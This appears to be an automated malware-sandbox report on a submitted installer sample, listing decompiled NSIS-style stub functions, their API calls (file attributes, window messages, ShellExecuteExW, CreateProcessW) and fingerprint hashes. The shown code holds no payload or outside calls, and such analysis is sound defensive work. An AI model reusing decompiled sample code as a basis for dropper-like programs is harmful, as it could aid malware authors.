                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                      • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E004015A3() {
                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t5 = SetFileAttributesW(E00402C41(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                                                                                                                                                      				_t14 = _t5;
                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                      					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}






                                                                                                                                                                                      0x004015ae
                                                                                                                                                                                      0x004015b4
                                                                                                                                                                                      0x004015b6
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 3373ebc29297150c52a7c16658d024659abe7c791ddab22f1f9b1f72b663fefc
                                                                                                                                                                                      • Instruction ID: 5499d889e10e12284ba9d0e0803ee079e3e67a5a0dd97beb148b5d1e1bc1fcbb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3373ebc29297150c52a7c16658d024659abe7c791ddab22f1f9b1f72b663fefc
                                                                                                                                                                                      • Instruction Fuzzy Hash: E7D01232B04100D7DB10DBA4AF4899D73A49B44369B304677E502F11D0D6B9D9519A2D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E004043AB(int _a4) {
                                                                                                                                                                                      				struct HWND__* _t2;
                                                                                                                                                                                      				long _t3;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t2 =  *0x429218;
                                                                                                                                                                                      				if(_t2 != 0) {
                                                                                                                                                                                      					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                                                                                                                      					return _t3;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x004043ab
                                                                                                                                                                                      0x004043b2
                                                                                                                                                                                      0x004043bd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004043bd
                                                                                                                                                                                      0x004043c3

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                                                                                                                                                      • Instruction ID: f8057fa4cd378f1a8adf26ed8b17c038a4feeda265d9f6fa174188bdeaa95141
                                                                                                                                                                                      • Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FC04C71780200BADA208BA49D85F0677545790700F1495797640E50E4C674D460D66C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E0040345D(long _a4) {
                                                                                                                                                                                      				long _t2;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                      			}




                                                                                                                                                                                      0x0040346b
                                                                                                                                                                                      0x00403471

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00405A14(struct _SHELLEXECUTEINFOW* _a4) {
                                                                                                                                                                                      				struct _SHELLEXECUTEINFOW* _t4;
                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t4 = _a4;
                                                                                                                                                                                      				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                                                                                                                                                      				_t4->cbSize = 0x3c; // executed
                                                                                                                                                                                      				_t5 = ShellExecuteExW(_t4); // executed
                                                                                                                                                                                      				return _t5;
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x00405a14
                                                                                                                                                                                      0x00405a19
                                                                                                                                                                                      0x00405a1d
                                                                                                                                                                                      0x00405a23
                                                                                                                                                                                      0x00405a29

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00405A23
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 587946157-0
                                                                                                                                                                                      • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                                                                                      • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00404394(int _a4) {
                                                                                                                                                                                      				long _t2;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                      			}




                                                                                                                                                                                      0x004043a2
                                                                                                                                                                                      0x004043a8

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                                                                                      • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                                                                                                      • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00404381(int _a4) {
                                                                                                                                                                                      				int _t2;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t2 = EnableWindow( *0x423724, _a4); // executed
                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                      			}




                                                                                                                                                                                      0x0040438b
                                                                                                                                                                                      0x00404391

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404158), ref: 0040438B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                      • Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                                                                                                                                                      • Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
                                                                                                                                                                                      • Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                      			E00401F06() {
                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t19 = E00402C41(_t15);
                                                                                                                                                                                      				E00405450(0xffffffeb, _t7); // executed
                                                                                                                                                                                      				_t9 = E004059D1(_t19); // executed
                                                                                                                                                                                      				_t20 = _t9;
                                                                                                                                                                                      				if(_t20 == _t15) {
                                                                                                                                                                                      					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
                                                                                                                                                                                      						_t13 = E00406873(_t17, _t20);
                                                                                                                                                                                      						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
                                                                                                                                                                                      							if(_t13 != _t15) {
                                                                                                                                                                                      								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E0040632F( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(_t20);
                                                                                                                                                                                      					CloseHandle();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}









                                                                                                                                                                                      0x00401f0c
                                                                                                                                                                                      0x00401f11
                                                                                                                                                                                      0x00401f17
                                                                                                                                                                                      0x00401f1c
                                                                                                                                                                                      0x00401f20
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00401f26
                                                                                                                                                                                      0x00401f29
                                                                                                                                                                                      0x00401f2c
                                                                                                                                                                                      0x00401f34
                                                                                                                                                                                      0x00401f43
                                                                                                                                                                                      0x00401f45
                                                                                                                                                                                      0x00401f45
                                                                                                                                                                                      0x00401f36
                                                                                                                                                                                      0x00401f3a
                                                                                                                                                                                      0x00401f3a
                                                                                                                                                                                      0x00401f34
                                                                                                                                                                                      0x00401f4c
                                                                                                                                                                                      0x00401f4d
                                                                                                                                                                                      0x00401f4d
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00402F08), ref: 004054AB
                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll), ref: 004054BD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                        • Part of subcall function 004059D1: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                                                                                        • Part of subcall function 004059D1: CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                        • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                        • Part of subcall function 00406873: GetExitCodeProcess.KERNEL32(?,?), ref: 004068A6
